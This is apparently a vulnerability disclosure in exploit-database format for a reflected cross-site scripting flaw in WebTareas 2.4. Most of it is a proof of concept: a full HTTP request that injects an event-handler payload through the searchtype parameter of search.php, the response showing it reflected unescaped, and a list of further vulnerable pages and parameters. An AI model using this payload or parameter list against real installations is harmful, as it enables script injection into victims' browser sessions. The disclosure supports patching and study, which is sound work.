WebTareas 2.4 Cross Site Scripting

# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: [email protected]# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Proof Of Concept -----------------------------------------------------------------------------------------------------------------------Param: searchtype-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateOrigin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/webtareas/general/search.php?searchtype=simpleCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 07:46:31 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 11147[...]<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">[...]-----------------------------------------------------------------------------------------------------------------------Other vulnerable url and params:-----------------------------------------------------------------------------------------------------------------------/webtareas/administration/print_layout.php [doc_type]/webtareas/general/login.php [logout]/webtareas/general/login.php [session]/webtareas/general/newnotifications.php [msg]/webtareas/general/search.php [searchtype]/webtareas/administration/print_layout.php [doc_type]